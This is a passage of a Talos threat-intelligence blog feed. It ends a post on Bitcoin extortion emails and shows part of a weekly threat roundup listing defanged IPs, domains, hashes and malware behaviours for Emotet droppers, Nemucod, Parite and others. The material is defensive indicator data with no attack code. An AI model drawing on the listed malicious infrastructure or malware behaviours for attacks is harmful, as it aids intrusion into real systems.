href="https://3.bp.blogspot.com/-3UGFLjsIWXA/XBPrYDcMswI/AAAAAAAAAj8/yK5YyQxUeJ4ZBUirquz-V1MhS584mlmIwCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="418" data-original-width="707" height="378" src="https://3.bp.blogspot.com/-3UGFLjsIWXA/XBPrYDcMswI/AAAAAAAAAj8/yK5YyQxUeJ4ZBUirquz-V1MhS584mlmIwCLcBGAs/s640/image1.png" width="640" /></a><br /><small>An example of the newer extortion emails, claiming they will dump acid on the victim unless they receive a Bitcoin payment.</small></div><br /><br />So far, none of the Bitcoin addresses associated with these new emails have received any payments. The source of the sending IP addresses changed, however. This time, the attackers are making heavy use of IP addresses at the Russian hosting company <a href="https://www.google.com/url?q=https://timeweb.com/ru&amp;sa=D&amp;ust=1544812443438000">TimeWeb</a>. As with the bomb threats, these IP addresses belong to domains that the attackers likely compromised.<br /><br />The criminals conducting these extortion email attacks have demonstrated that they are willing to concoct any threat and story imaginable that they believe would fool the recipient. At this point, we have seen several different variations of these emails, and we expect these sorts of attacks to continue as long as there are victims who will believe these threats to be credible, and be scared enough to send money to the attackers. Talos encourages users not to fall for these schemes and — above all — <b>DO NOT pay extortion payments</b>. Doing so will only confirm for the attackers that their social engineering approach is working, and victims' money goes directly toward facilitating additional attacks.<br /><br /><h4 id="h.hhnvb3od61h">IOCs (BTC Addresses)</h4>11B68RbmyxQys2CXXbAZxcwVXnaWCNBbw<br />12MET3CnEBkRc5Si5udf95fGaTZ6JwgpkK<br />132f8T1qF9hZj13MvPN5FbxrAhGExYZ7P3<br />149oyt2DL52Jgykhg5vh7Jm1QpdpfuyVqd<br />15F7TCqGRWE66xrBNxyt9ko1XsKaQvEh9t<br />15qH84uLC49CmC6jRE958Qjcf9WRZ2rMuM<br />1893DMwnrq9vA6JmQBdyWRKecArDAUTcGR<br />18UNWkvEDXgYzSAVnTmaR1X66w3T7HHsdn<br />1BTuxsCpAGtCzcszvFV2g4beqAZ2AUnyFh<br />1BfmmRBfhujpK944gai4vWvwCwGeHKbmkB<br />1BHasGex1jhRZeY7KyUGGKUNRtVgKedRY8<br />1CDs3JXUU6wNmndAF7EFcrJ6GGSYRKXd7w<br />1CF9VQhwjJutPxwVq5QLFA7j7baq4RDb3w<br />1CXrmcKL7W2o6FnrFx3ZBGn2EAsbMVZMzD<br />1CdD3nthrWR76RkL1WwLH7BSqCFASLjbhu<br />1D3ArQebDneVBVCqLort9jwvUA3AoZaNq5<br />1DVVQpxF4nG7rmuQFb7ZboGxu6ahKJcjf5<br />1Dnw2qJxGFCZdE3PzCaVioBB9zERc7SzRB<br />1DRXeydtqfjAmvfrLY7XiCo2A1vCq32z3a<br />1Ebf2rrLxVuMGKkwi2PeZtjBEEiidxrkkL<br />1FnTQHffH42iS15FMYNZxmNdbXtmb8WChF<br />1GTd6DPqcxCwX263BMsvk7FcjCQxsXhJUs<br />1GYAJY3GRsC5twdPgmQiEeNjdn7Kx6KSPd<br />1L5SWCu4ZTLiyPyTAvfSVjhKrYNSnYgBKk<br />1LEevM4MxKSGRrTvVrvLyjiuq3vYssdTRa<br />1LT4WgSuTD71Emzc7DLeHxVoZ1RjkhNcFY<br />1LTYBLzVSLe6GDFJ5NVVxLR2j5eQ8Wy51N<br />1LjxZonruwcKXEUYySrXt7gWGJLL6Pzuyx<br />1M9r1FpWj5QbSMECeJvXoa85TDMpoQcRaT<br />1MeDDtvZB5TE5tDTcwk6GiGSK3sTAP2KLA<br />1P3cNFy3SdfZ8PvMSdgLRcb2TtaLvxfqat<br />1PqX7bMnCzpJ7L1mxuGgNyaJSkJRM8SjES<br /><br /><br /><h4 id="h.hhnvb3od61h">Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Yvbi-tyGpOA/XBPuIrU2FhI/AAAAAAAAAkM/nwzfPN62lw0xbsdQhG8EUiCyD4YIgTo-ACLcBGAs/s1600/coverage.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1194" data-original-width="1600" height="297" src="https://2.bp.blogspot.com/-Yvbi-tyGpOA/XBPuIrU2FhI/AAAAAAAAAkM/nwzfPN62lw0xbsdQhG8EUiCyD4YIgTo-ACLcBGAs/s400/coverage.png" width="400" /></a></div><br /></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/rgRN4Fc1BGk" height="1" width="1" alt=""/>2018-12-14T13:59:58.561-05:000https://blog.talosintelligence.com/2018/12/bitcoin-bomb-scare-associated-with.htmlThreat Roundup for Dec. 7 to Dec. 14http://feedproxy.google.com/~r/feedburner/Talos/~3/A4O1YSiP_AY/threat-roundup-1207-1214.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 14 Dec 2018 09:52:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-3274858416711840530<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABQ/MjxDRHMcG884MPWC8_VvkkBYeFaz38pogCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABQ/MjxDRHMcG884MPWC8_VvkkBYeFaz38pogCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br /><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div></div></div>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 07 and Dec. 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.<br /><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />You can find an additional JSON file <a href="https://alln-extcloud-storage.cisco.com/ciscoblogs/5c13fb1ad467d.txt">here</a> that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.<br /><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Doc.Malware.Dkvn-6781497-0</b><br /> Malware<br /> This is a trojan that drops a malicious executable and executes PowerShell commands. It can be used as a downloader or a dropper for Emotet.<br />&nbsp;</li><li><b>Txt.Malware.Nemucod-6780827-0</b><br /> Malware<br /> Nemucod is a trojan that executes ransomware on a victim's computer.<br />&nbsp;</li><li><b>Win.Virus.Parite-6780568-0</b><br /> Virus<br /> Parite is a polymorphic file infector. It infects executable files on the local machine and network drives.<br />&nbsp;</li><li><b>Xls.Downloader.Jums-6779285-0</b><br /> Downloader<br /> Jums is a trojan that spawns a PowerShell and creates and executes a malicious executable. It collects a large of amount of system information and reaches out to a remote server after installation.<br />&nbsp;</li><li><b>Win.Virus.Sality-6780277-0</b><br /> Virus<br /> Sality is a file infector that establishes a peer-to-peer botnet. Although it's been prevalent for more than a decade, we continue to see new samples that require marginal attention in order to remain consistent with detection. Once a Sality client bypasses perimeter security, its goal is to execute a downloader component capable of executing additional malware.<br />&nbsp;</li><li><b>Doc.Malware.Powload-6775735-0</b><br /> Malware<br /> Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing the Emotet malware.<br />&nbsp;</li><li><b>PUA.Win.Trojan.Hupigon-6776762-0</b><br /> Trojan<br /> Hupigon is a trojan that installs itself as a backdoor on a victim's machine.<br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Doc.Malware.Dkvn-6781497-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Canon PIXMA MG2520\PrinterDriverData </li></ul><b>Mutexes</b><br /><ul><li>Local\10MU_ACB10_S-1-5-5-0-57527</li><li>Local\10MU_ACBPIDS_S-1-5-5-0-57527</li><li>Local\WinSpl64To32Mutex_e162_0_3000</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>45[.]40[.]183[.]1</li><li>66[.]198[.]240[.]4</li><li>103[.]18[.]109[.]178</li><li>192[.]169[.]140[.]162</li><li>209[.]151[.]241[.]184</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>enthos[.]net</li><li>shofar[.]com</li><li>shawktech[.]com</li><li>thecreativeshop[.]com[.]au</li><li>burlingtonadvertising[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%UserProfile%\Documents\20181212</li><li>%LocalAppData%\Temp\109.exe</li><li>%SystemDrive%\~$6889120.doc</li><li>%LocalAppData%\Temp\2vuqj0ws.zbs.ps1</li><li>%LocalAppData%\Temp\4ezh4c4j.esn.psm1</li><li>%LocalAppData%\Temp\CVR95F8.tmp</li><li>%LocalAppData%\Temp\~DF78CDE2D9B1588659.TMP</li></ul><b>File Hashes</b><br /><ul><li>0421be0b17b64e14118e01ec412f1721bb9079630a004ff7e846f954c2355538</li><li>18bf25020d301b1b22e316d2a6909a40c8dcea59fb04057d58346bdb58a7503c</li><li>24ee6e8bd38b5bef0c3db97c8cfdf03a38e442b624a1f7f731fb6e7c2989d6ea</li><li>2d50cc5a4ac493e5578038e8f892f9df5e134114ed6e9840089d9f32b8f28440</li><li>2ed82969c7fb23e18f1f9b0ab519124438129dc7f2530ee24604397b9c1250de</li><li>3e662508b29b2ef40092655a69073c220770a8306c0b17773059e07fe1a712b3</li><li>5ed274afe729b6b92cbb4446fa3f4f6130c8e20b3a903b13d7691d2006d2e72d</li><li>6d34270f0aeb0fbdb270e47866413a299a1deb54e7c4dd6b785a0ca7f2e0c73a</li><li>727afa31d97e874e3d2a3c11870a5b1b65ecda8905e3c97cbddb31a9fbfaf543</li><li>74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89</li><li>827c0012de03d21f84442e7dd0ea1d0a25f40b0e2982fab1695f935aaf471bd0</li><li>91da45beb83ea575f50ff8d9d6dcad7d9efa437b7e337006b2cc8ed2f6d4faf2</li><li>ac280877daecf65f6570233d76c249caa8eaa52cb5ba31fc3e1611d45c8d0454</li><li>aeef6e04c09d5f051f94a5c6545cf4228670954274ab97f1c85e7c78f1e6f116</li><li>af8a10416ae6e32a6250cf03d8c3ba37933903accf649e9feb4f636c17ae2b54</li><li>c26e6b57799f13d5d8353834bd721b304a15a7bbbb238995dbf98c4a26b71be3</li><li>d77fdb097fb549034a72f67236bf4c744012ff71e43f37cd89e373645fc26288</li><li>da7ac63e1a221dba1fb4d1ee743537b985fde34ad9bbc372fcc07a184ce683a7</li><li>db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b</li><li>dd57c3ea2596874a51b13fe84d3dc328365af06bd0f50eb328819bc970766fde</li><li>de2c3b81106ab89e0dd2c7d654b0a161e2227bbaafcd1b1860c387c7b67be69d</li><li>e2ae044f486dba0d5005295ffa9100411a6225fff6c061da69225b6c50834a69</li><li>e4269fcfda0fe8ef8872dbf51aec6dc9cbb18ad4eae281700be24f563164026d</li><li>e71d9efea3a62cc265938bac1c53aa96f8729609cabfc6df4c66d5c5e9c016fe</li><li>eb2bb764fb66c7c5509c7ce50ee3e0c61a675867f85ecdae78ad547b0ac72760</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-lkxWRVKTgfE/XBP7sAijTCI/AAAAAAAABRE/AP8XeGmALD4iYY4ei05JIsbQtu4bW5WBwCLcBGAs/s1600/db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-lkxWRVKTgfE/XBP7sAijTCI/AAAAAAAABRE/AP8XeGmALD4iYY4ei05JIsbQtu4bW5WBwCLcBGAs/s400/db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-VQ5ebfZlbo0/XBP7xWeQSFI/AAAAAAAABRI/nTCiDh5R9vw-FDOPhumnhKDCeQfotVMRgCLcBGAs/s1600/db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-VQ5ebfZlbo0/XBP7xWeQSFI/AAAAAAAABRI/nTCiDh5R9vw-FDOPhumnhKDCeQfotVMRgCLcBGAs/s640/db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Pk4LV1jSUsQ/XBP74XYQfDI/AAAAAAAABRM/ti-tdfrWumwr5DoZCCbhqHU5zsl3mzgRwCLcBGAs/s1600/74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/-Pk4LV1jSUsQ/XBP74XYQfDI/AAAAAAAABRM/ti-tdfrWumwr5DoZCCbhqHU5zsl3mzgRwCLcBGAs/s640/74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-8V0asabKXUk/XBP8BUKblgI/AAAAAAAABRU/thWi0FMOUvo8EwxKQ_-SyYNTolXyGhC2ACLcBGAs/s1600/74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://1.bp.blogspot.com/-8V0asabKXUk/XBP8BUKblgI/AAAAAAAABRU/thWi0FMOUvo8EwxKQ_-SyYNTolXyGhC2ACLcBGAs/s640/74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89_malware.png" width="640" /></a></div><b><br /></b><br /><h3>Txt.Malware.Nemucod-6780827-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>144[.]217[.]147[.]190</li><li>201[.]187[.]101[.]156</li><li>185[.]104[.]28[.]132</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>www[.]w3[.]org</li><li>api[.]w[.]org</li><li>gmpg[.]org</li><li>ikincielesyaevi[.]com</li><li>www[.]ikincielesyaevi[.]com</li><li>www[.]gulfshorecooling[.]com</li><li>elemaroregon[.]com</li><li>gpconstructie[.]be</li><li>cvcpdx[.]com</li><li>www[.]chaffinww[.]com</li><li>workwithcore[.]com</li><li>phoenixconstruction[.]com</li><li>www[.]laneexteriorsllc[.]com</li><li>autosorno[.]cl</li><li>cleanairtx[.]com</li><li>www[.]ohiostatestucco[.]com</li><li>www[.]teknikinc[.]com</li><li>GOESTOM[.]COM</li><li>CLARAMUSICA[.]COM</li><li>claramusica[.]com</li><li>goestom[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>\ROUTER</li><li>\DAV RPC SERVICE</li><li>\Device\Null</li><li>\Win32Pipes.00000370.00000001</li><li>\Win32Pipes.00000370.00000002</li></ul><b>File Hashes</b><br /><ul><li>029cfbcb0e44965e253979458652858b3eabfff38be5e7648c8b82f475233345</li><li>0cb706b11174c5a7fd08e70308d1ff84447d6e65a487b146846d5150931a8970</li><li>17304c0d1c57c83a58b5b1df2e6fe5b0b2a58634d1cebbd83ce8bd5533fea584</li><li>215953913e52f0e071dd8244d598a7c34367d03558599f7b9c824d916f60186a</li><li>2c93a65ec63e429b8e8a971dbaea069829763235daeb26a5f24adc69debbff71</li><li>38848aedc1194c09d6eeb88ef04ba56aee22e0f579284a63b12d896fdb0d4831</li><li>3bf5629a35700582d0abbdf8aa1c97c34c4f2fd933de6f70569d2b3103f6379e</li><li>4d85b12eddc09b1cfdfd8d580ecca6d724dd66b91d8866f707aa91cb50c7fbd7</li><li>5247f2722b8623e95f8d10cd79d0fbe3e96fe8f0527d3b9be480d2640f02b160</li><li>52cecc5d101a881b137c07143268217dacf145dab73d50e0e8da318000f5b5e0</li><li>59109d8c01b76ebe171dc28cbe37ceb393846d0ed240f54a14eb9014588c748d</li><li>5c2d33368a931651ea426f3ed037185d99c7c3bb28d5430413a2c93b4f525428</li><li>66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b</li><li>7d9fcffa70fec088cda7c4095740599a45a710ce38a66fa9e13f0dfb7bc43b3b</li><li>8afdadaa66d58e386411755871ff91858bb99016e22e67de3ce3cc63ea35c4a8</li><li>918312a6b9b634f27089520d15dc15966a25bd719627962d756f370949adb152</li><li>af0ab34d44410fab4cfb8c24dfc0240e508de5e31a0eb567c0533344eb9c92fe</li><li>de5e00e84554eb352985d85146eb696be474c1f5b97a764052fc0575fec8ad13</li><li>e29d601569f5197e631275c5391a273058ab2aca0473dedf148177516de1e7c5</li><li>f40f059bad77bf7297b3783af078e8febf11650709294e69a9c198c711a87386</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-WDEvF5Vv_GI/XBP8PdugCGI/AAAAAAAABRc/emwyH-UWnV4HV_GIyPU_VICPxri49SniQCLcBGAs/s1600/2c93a65ec63e429b8e8a971dbaea069829763235daeb26a5f24adc69debbff71_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-WDEvF5Vv_GI/XBP8PdugCGI/AAAAAAAABRc/emwyH-UWnV4HV_GIyPU_VICPxri49SniQCLcBGAs/s400/2c93a65ec63e429b8e8a971dbaea069829763235daeb26a5f24adc69debbff71_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-DPX35Zm-zSs/XBP8UG_PUQI/AAAAAAAABRk/G2ZzeQwyxi4Iq9KmCWh9TlRtCVESvV4ngCLcBGAs/s1600/66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="639" data-original-width="962" height="424" src="https://1.bp.blogspot.com/-DPX35Zm-zSs/XBP8UG_PUQI/AAAAAAAABRk/G2ZzeQwyxi4Iq9KmCWh9TlRtCVESvV4ngCLcBGAs/s640/66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-DE9X1L8khxE/XBP8Yg-KjBI/AAAAAAAABRo/UsDZT2zbBkQNxqdNnqm10HYS5Cno31clACLcBGAs/s1600/17304c0d1c57c83a58b5b1df2e6fe5b0b2a58634d1cebbd83ce8bd5533fea584_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-DE9X1L8khxE/XBP8Yg-KjBI/AAAAAAAABRo/UsDZT2zbBkQNxqdNnqm10HYS5Cno31clACLcBGAs/s640/17304c0d1c57c83a58b5b1df2e6fe5b0b2a58634d1cebbd83ce8bd5533fea584_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Mc0uZVwdSOo/XBP8eFLIMnI/AAAAAAAABRs/0rxBcsxDJ4s7eA6o-eJCjLMeK7hNA-hKQCLcBGAs/s1600/66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://2.bp.blogspot.com/-Mc0uZVwdSOo/XBP8eFLIMnI/AAAAAAAABRs/0rxBcsxDJ4s7eA6o-eJCjLMeK7hNA-hKQCLcBGAs/s640/66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b_malware.png" width="640" /></a></div><br /><br /><h3>Win.Virus.Parite-6780568-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>InstallLauncher_4541454E-9FFA-4246-835D-3F49EFA91F6C</li><li>\BaseNamedObjects\InstallLauncher_4541454E-9FFA-4246-835D-3F49EFA91F6C</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\ejp5C31.tmp</li></ul><b>File Hashes</b><br /><ul><li>03b06a1f568e2985a763c155c14c2a9c4b7b18471d91bf2164ad44350d4353d6</li><li>0478b98235d5c49bc7facddce8f912a4ec2b58c33b4947922927e139b9efba1f</li><li>11ec64be12c389f32640d9803deffa8f93b9457572c71f36df3fe0df4e1f6a8b</li><li>17527e946bbac0ed6c69fe1b97d4d16a8d2ea20811898ee471bf0f9e4377d3e7</li><li>250e929dc833074872defd3ca65b2ccf6cf9b32ed6f6cfca07a66767e48db6d4</li><li>2a4b55983c456e9ea14115378397e67df37d89a28818cb3f557b8afbb3e086e3</li><li>2f6a2d0728cad1403d52a3dfc6db10011fa215f6f5b8272e5c4699e1a68afaf2</li><li>318722e8243edf25c73800569cc1d78c8a6f62aa382f484116c0197d3cfc6578</li><li>3858721e1297e627247f17ebf44ff0502981481af3c04ebb6c76bafda0db2c6d</li><li>3aea0bd31f0d86f9c5a5035828dea6e42cb0646c204bb866c71528bd1f714e7f</li><li>55e263c3206ceed9776d0d0b6015cc5e7c444bed6c68a66766d34998fb744ff1</li><li>5b6e1419168ecd9ead5800273b1c63fa6420455b1ac2c85be430d5e976f4a104</li><li>69528927f100ff5c7b92e6898f33e94768953fceed5ffb71fce02dc6acb9ca56</li><li>6efd875b023b1289020e7d2acd02526d61592f4dd5e1b35e2ca04eeae162507b</li><li>78af109d92ce244c02b1530f7ae65f2c9958e34e239788caf3ee94115ad36d47</li><li>8240517c639812a704d439035b22fe685b3b905bb376776c4adcc264862675e7</li><li>8e170f44cd0e49ad850ffbd244ad755d1b0b7b91051308ed18c049a5e6068acc</li><li>8f6c73d10c4c5f1ee2758f80bbee0e2700978b34ec74b83296ec9e3a403e81db</li><li>94aad46d563c9f5a46bc1e1316d638f7e96ab4ac07b7925510644768504c9d1d</li><li>9d818507ca3222b5f1f471ae1c4338de9227e95b12ac838eed1d68550019aa22</li><li>c1b87392cafff0a07c0dedfa59da2936a371bf2e40855c9b1a1d6bf66903ef12</li><li>c56b47185d4176e620a12ba8f752a67d4e264919127970f0f8bb567f5f778511</li><li>d9cc0b9443f5ec4f84070165ddd08d3def72662df47b52795b793725547816b3</li><li>dafa195b9f7cf1b3d249ccc6e40bbc181aa54878faf3411b78ccea85e4e4f255</li><li>e77216030291a46d69d4bdf5725dc052d16e6ed7d6485b85cfcc8c4b88bc4313</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-nTc_4Hbk2eo/XBP8tHlt_CI/AAAAAAAABR8/7sBRvm0QWyMVcwpMQe0jYeTUu-b8p2opwCLcBGAs/s1600/2a4b55983c456e9ea14115378397e67df37d89a28818cb3f557b8afbb3e086e3_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-nTc_4Hbk2eo/XBP8tHlt_CI/AAAAAAAABR8/7sBRvm0QWyMVcwpMQe0jYeTUu-b8p2opwCLcBGAs/s400/2a4b55983c456e9ea14115378397e67df37d89a28818cb3f557b8afbb3e086e3_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-UJXXPG_cSpA/XBP8y3SZcDI/AAAAAAAABSE/2W23JSt1MGcp69m0S5W2pQQaQYpOihSbwCLcBGAs/s1600/3aea0bd31f0d86f9c5a5035828dea6e42cb0646c204bb866c71528bd1f714e7f_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="636" data-original-width="962" height="422" src="https://3.bp.blogspot.com/-UJXXPG_cSpA/XBP8y3SZcDI/AAAAAAAABSE/2W23JSt1MGcp69m0S5W2pQQaQYpOihSbwCLcBGAs/s640/3aea0bd31f0d86f9c5a5035828dea6e42cb0646c204bb866c71528bd1f714e7f_tg.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-aIJko68jxKU/XBP83whBFNI/AAAAAAAABSI/q_mA6vl1S2wTW4zUKsNRBTd3FQ5RVHmnwCLcBGAs/s1600/c1b87392cafff0a07c0dedfa59da2936a371bf2e40855c9b1a1d6bf66903ef12_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://2.bp.blogspot.com/-aIJko68jxKU/XBP83whBFNI/AAAAAAAABSI/q_mA6vl1S2wTW4zUKsNRBTd3FQ5RVHmnwCLcBGAs/s640/c1b87392cafff0a07c0dedfa59da2936a371bf2e40855c9b1a1d6bf66903ef12_malware.png" width="640" /></a></div><br /><br /><h3>Xls.Downloader.Jums-6779285-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Global\552FFA80-3393-423d-8671-7BA046BB5906</li><li>Local\ZonesCacheCounterMutex</li><li>KYIMEShareCachedData.MutexObject.Administrator</li><li>KYTransactionServer.MutexObject.Administrator</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>192[.]185[.]16[.]22</li><li>192[.]254[.]237[.]11</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>www[.]aaaplating[.]com</li><li>weighcase[.]co[.]uk</li></ul><b>Files and or directories created</b><br 